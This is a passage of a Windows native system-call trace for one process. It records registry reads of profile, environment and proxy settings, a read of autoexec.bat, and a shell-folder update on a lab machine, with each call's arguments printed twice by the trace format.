 04480   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\15\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0Z\304/K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=180}, "\5\0\2\3\20\0\0\0\264\0\0\0\14\0\0\0\234\0\0\0\0\0\0\0`\243\27\0\1\0\0\0l\243\27\0 \0\0\0\1\0\0\0\16\0\20\0x\243\27\0\210\243\27\0\10\0\0\0\0\0\0\0\7\0\0\0M\0Y\0W\0O\0R\0L\0D\0O\0\4\0\0\0\1\4\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\1\0\0\0P\272\27\0\1\0\0\0\1\0\0\0\20\0\22\0d\272\27\0\0\0\0\0\0\0\0\0\11\0\0\0\0\0\0\0\10\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0\1\0\0\0\0\0\0\0", ) , 44, 1024, ... {status=0x103, info=180},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\15\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0Z\304/K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=180}, "\5\0\2\3\20\0\0\0\264\0\0\0\14\0\0\0\234\0\0\0\0\0\0\0`\243\27\0\1\0\0\0l\243\27\0 \0\0\0\1\0\0\0\16\0\20\0x\243\27\0\210\243\27\0\10\0\0\0\0\0\0\0\7\0\0\0M\0Y\0W\0O\0R\0L\0D\0O\0\4\0\0\0\1\4\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\1\0\0\0P\272\27\0\1\0\0\0\1\0\0\0\20\0\22\0d\272\27\0\0\0\0\0\0\0\0\0\11\0\0\0\0\0\0\0\10\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0\1\0\0\0\0\0\0\0", ) , ) == 0x103
 04481   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04482   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04483   712   NtQueryInformationToken  (640, User, 200, ... {token info, class 1, size 36}, 36, ) == 0x0
 04484   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1078081533-484763869-839522115-1003"}, ... 664, ) }, ... 664, ) == 0x0
 04485   712   NtQueryValueKey  (664,  (664, "ProfileImagePath", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 104, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (664, "ProfileImagePath", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 104, ) }, 104, ) == 0x0
 04486   712   NtClose  (664, ... ) == 0x0
 04487   712   NtCreateKey  (0x2001f, {24, 644, 0x40, 0, 0,  (0x2001f, {24, 644, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon"}, 0, 0x0, 0, ... 664, 2, ) }, 0, 0x0, 0, ... 664, 2, ) == 0x0
 04488   712   NtQueryValueKey  (664,  (664, "ParseAutoexec", Partial, 144, ... TitleIdx=0, Type=1, Data="1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (664, "ParseAutoexec", Partial, 144, ... TitleIdx=0, Type=1, Data="1\0\0\0"}, 16, ) }, 16, ) == 0x0
 04489   712   NtClose  (664, ... ) == 0x0
 04490   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04491   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04492   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\c:\autoexec.bat"}, 24703624, ... ) }, 24703624, ... ) == 0x0
 04493   712   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 24703632,  (0x80100080, {24, 0, 0x40, 0, 24703632, "\??\c:\autoexec.bat"}, 0x0, 128, 1, 1, 96, 0, 0, ... 664, {status=0x0, info=1}, ) }, 0x0, 128, 1, 1, 96, 0, 0, ... 664, {status=0x0, info=1}, ) == 0x0
 04494   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04495   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04496   712   NtQueryInformationFile  (664, 24703648, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 04497   712   NtReadFile  (664, 0, 0, 0, 0, 0x0, 0, ... {status=0x0, info=0}, "", ) == 0x0
 04498   712   NtClose  (664, ... ) == 0x0
 04499   712   NtOpenKey  (0x20019, {24, 644, 0x40, 0, 0,  (0x20019, {24, 644, 0x40, 0, 0, "Environment"}, ... 664, ) }, ... 664, ) == 0x0
 04500   712   NtEnumerateValueKey  (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name= (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) , Data= (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) }, 96, ) == 0x0
 04501   712   NtEnumerateValueKey  (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name= (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) , Data= (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) }, 96, ) == 0x0
 04502   712   NtEnumerateValueKey  (664, 2, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 04503   712   NtEnumerateValueKey  (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name= (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) , Data= (664, 0, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) }, 96, ) == 0x0
 04504   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04505   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04506   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temp"}, 24702364, ... ) }, 24702364, ... ) == 0x0
 04507   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 668, {status=0x0, info=1}, ) }, 3, 16417, ... 668, {status=0x0, info=1}, ) == 0x0
 04508   712   NtQueryDirectoryFile  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1,  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1, "Documents and Settings", 0, ... {status=0x0, info=138}, ) , 0, ... {status=0x0, info=138}, ) == 0x0
 04509   712   NtClose  (668, ... ) == 0x0
 04510   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\"}, 3, 16417, ... 668, {status=0x0, info=1}, ) }, 3, 16417, ... 668, {status=0x0, info=1}, ) == 0x0
 04511   712   NtQueryDirectoryFile  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1,  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1, "Local Settings", 0, ... {status=0x0, info=122}, ) , 0, ... {status=0x0, info=122}, ) == 0x0
 04512   712   NtClose  (668, ... ) == 0x0
 04513   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04514   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04515   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04516   712   NtEnumerateValueKey  (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name= (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) , Data= (664, 1, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0\0\0"}, 96, ) }, 96, ) == 0x0
 04517   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04518   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04519   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Local Settings\Temp"}, 24702364, ... ) }, 24702364, ... ) == 0x0
 04520   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 668, {status=0x0, info=1}, ) }, 3, 16417, ... 668, {status=0x0, info=1}, ) == 0x0
 04521   712   NtQueryDirectoryFile  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1,  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1, "Documents and Settings", 0, ... {status=0x0, info=138}, ) , 0, ... {status=0x0, info=138}, ) == 0x0
 04522   712   NtClose  (668, ... ) == 0x0
 04523   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\"}, 3, 16417, ... 668, {status=0x0, info=1}, ) }, 3, 16417, ... 668, {status=0x0, info=1}, ) == 0x0
 04524   712   NtQueryDirectoryFile  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1,  (668, 0, 0, 0, 24701724, 616, BothDirectory, 1, "Local Settings", 0, ... {status=0x0, info=122}, ) , 0, ... {status=0x0, info=122}, ) == 0x0
 04525   712   NtClose  (668, ... ) == 0x0
 04526   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04527   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04528   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04529   712   NtEnumerateValueKey  (664, 2, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 04530   712   NtClose  (664, ... ) == 0x0
 04531   712   NtOpenKey  (0x20019, {24, 644, 0x40, 0, 0,  (0x20019, {24, 644, 0x40, 0, 0, "Volatile Environment"}, ... 664, ) }, ... 664, ) == 0x0
 04532   712   NtEnumerateValueKey  (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name="LOGONSERVER", Data="\\0\\0M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 64, ) , Data= (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name="LOGONSERVER", Data="\\0\\0M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 64, ) }, 64, ) == 0x0
 04533   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04534   712   NtEnumerateValueKey  (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEDRIVE", Data="C\0:\0\0\0"}, 46, ) , Data= (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEDRIVE", Data="C\0:\0\0\0"}, 46, ) }, 46, ) == 0x0
 04535   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04536   712   NtEnumerateValueKey  (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEPATH", Data="\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 102, ) , Data= (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEPATH", Data="\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 102, ) }, 102, ) == 0x0
 04537   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04538   712   NtEnumerateValueKey  (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name="CLIENTNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 56, ) , Data= (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name="CLIENTNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 56, ) }, 56, ) == 0x0
 04539   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04540   712   NtEnumerateValueKey  (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name="SESSIONNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 60, ) , Data= (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name="SESSIONNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 60, ) }, 60, ) == 0x0
 04541   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04542   712   NtEnumerateValueKey  (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name="APPDATA", Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 140, ) , Data= (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name="APPDATA", Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 140, ) }, 140, ) == 0x0
 04543   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04544   712   NtEnumerateValueKey  (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name="HOMESHARE", Data="\0\0"}, 42, ) , Data= (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name="HOMESHARE", Data="\0\0"}, 42, ) }, 42, ) == 0x0
 04545   712   NtEnumerateValueKey  (664, 7, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 04546   712   NtEnumerateValueKey  (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name="LOGONSERVER", Data="\\0\\0M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 64, ) , Data= (664, 0, Full, 220, ... TitleIdx=0, Type=1, Name="LOGONSERVER", Data="\\0\\0M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 64, ) }, 64, ) == 0x0
 04547   712   NtEnumerateValueKey  (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEDRIVE", Data="C\0:\0\0\0"}, 46, ) , Data= (664, 1, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEDRIVE", Data="C\0:\0\0\0"}, 46, ) }, 46, ) == 0x0
 04548   712   NtEnumerateValueKey  (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEPATH", Data="\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 102, ) , Data= (664, 2, Full, 220, ... TitleIdx=0, Type=1, Name="HOMEPATH", Data="\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\0\0"}, 102, ) }, 102, ) == 0x0
 04549   712   NtEnumerateValueKey  (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name="CLIENTNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 56, ) , Data= (664, 3, Full, 220, ... TitleIdx=0, Type=1, Name="CLIENTNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 56, ) }, 56, ) == 0x0
 04550   712   NtEnumerateValueKey  (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name="SESSIONNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 60, ) , Data= (664, 4, Full, 220, ... TitleIdx=0, Type=1, Name="SESSIONNAME", Data="C\0o\0n\0s\0o\0l\0e\0\0\0"}, 60, ) }, 60, ) == 0x0
 04551   712   NtEnumerateValueKey  (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name="APPDATA", Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 140, ) , Data= (664, 5, Full, 220, ... TitleIdx=0, Type=1, Name="APPDATA", Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0"}, 140, ) }, 140, ) == 0x0
 04552   712   NtEnumerateValueKey  (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name= (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name="HOMESHARE", Data="\0\0"}, 42, ) , Data= (664, 6, Full, 220, ... TitleIdx=0, Type=1, Name="HOMESHARE", Data="\0\0"}, 42, ) }, 42, ) == 0x0
 04553   712   NtEnumerateValueKey  (664, 7, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 04554   712   NtClose  (664, ... ) == 0x0
 04555   712   NtClose  (644, ... ) == 0x0
 04556   712   NtFreeVirtualMemory  (-1, (0x17a0000), 0, 32768, ... (0x17a0000), 4096, ) == 0x0
 04557   712   NtClose  (652, ... ) == 0x0
 04558   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Application Data"}, 24704288, ... ) }, 24704288, ... ) == 0x0
 04559   712   NtQueryInformationToken  (640, User, 64, ... {token info, class 1, size 36}, 36, ) == 0x0
 04560   712   NtOpenKey  (0x2001f, {24, 124, 0x40, 0, 0,  (0x2001f, {24, 124, 0x40, 0, 0, "S-1-5-21-1078081533-484763869-839522115-1003"}, ... 652, ) }, ... 652, ) == 0x0
 04561   712   NtCreateKey  (0x2000000, {24, 652, 0x40, 0, 0,  (0x2000000, {24, 652, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 644, 2, ) }, 0, 0x0, 0, ... 644, 2, ) == 0x0
 04562   712   NtClose  (652, ... ) == 0x0
 04563   712   NtSetValueKey  (644,  (644, "AppData", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0", 104, ... ) , 0, 1,  (644, "AppData", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0S\0R\0I\0-\0u\0s\0e\0r\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0", 104, ... ) , 104, ... ) == 0x0
 04564   712   NtClose  (644, ... ) == 0x0
 04565   712   NtClose  (640, ... ) == 0x0
 04566   712   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\SRI-user\Application Data\Microsoft\Network\Connections\Pbk\"}, 3, 16417, ... ) }, 3, 16417, ... ) == STATUS_OBJECT_PATH_NOT_FOUND
 04567   712   NtCreateKey  (0x2, {24, 636, 0x40, 0, 0,  (0x2, {24, 636, 0x40, 0, 0, "Software\Microsoft\windows\CurrentVersion\Internet Settings"}, 0, "", 0, ... 640, 2, ) }, 0, "", 0, ... 640, 2, ) == 0x0
 04568   712   NtSetValueKey  (640,  (640, "MigrateProxy", 0, 4, "\1\0\0\0", 4, ... ) , 0, 4,  (640, "MigrateProxy", 0, 4, "\1\0\0\0", 4, ... ) , 4, ... ) == 0x0
 04569   712   NtClose  (640, ... ) == 0x0
 04570   712   NtOpenKey  (0x20019, {24, 636, 0x40, 0, 0,  (0x20019, {24, 636, 0x40, 0, 0, "Software\Microsoft\windows\CurrentVersion\Internet Settings"}, ... 640, ) }, ... 640, ) == 0x0
 04571   712   NtQueryValueKey  (640,  (640, "ProxyEnable", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (640, "ProxyEnable", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 04572   712   NtQueryValueKey  (640,  (640, "ProxyServer", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04573   712   NtQueryValueKey  (640,  (640, "ProxyOverride", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04574   712   NtQueryValueKey  (640,  (640, "AutoConfigURL", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 04575   712   NtClose  (640, ... ) == 0x0
 04576   712   NtWaitForSingleObject  (456, 0, 0x0, ... ) == 0x0
 04577   712   NtCreateKey  (0x1, {24, 636, 0x40, 0, 0,  (0x1, {24, 636, 0x40, 0, 0, "Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections"}, 0, "", 0, ... 640, 2, ) }, 0, "", 0, ... 640, 2, ) == 0x0
 04578   712   NtQueryValueKey  (640,  (640, "SavedLegacySettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\26\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (640, "SavedLegacySettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\26\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) }, 68, ) == 0x0
 04579   712   NtQueryValueKey  (640,  (640, "SavedLegacySettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\26\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (640, "SavedLegacySettings", Partial, 144, ... TitleIdx=0, Type=3, Data="<\0\0\0\26\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\0\0\0\00f\32\27\250\231\307\1\1\0\0\0\300\250|\200\0\0\0\0\0\0\0\0"}, 68, ) }, 68, ) == 0x0
 04580   712   NtReleaseMutant  (456, ... 0x0, ) == 0x0
 04581   712   NtClose  (640, ... ) == 0x0
 04582   712   NtWaitForSingleObject  (456, 0, 0x0, ... ) == 0x0
 04583   712   NtCreateKey  (0x1, {24, 636, 0x40, 0, 0,  (0x1, {24, 636, 0x40, 0, 0, "Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections"}, 0, "", 0, ... 640, 2, ) }, 0, "", 0, ... 640, 2, ) == 0x0
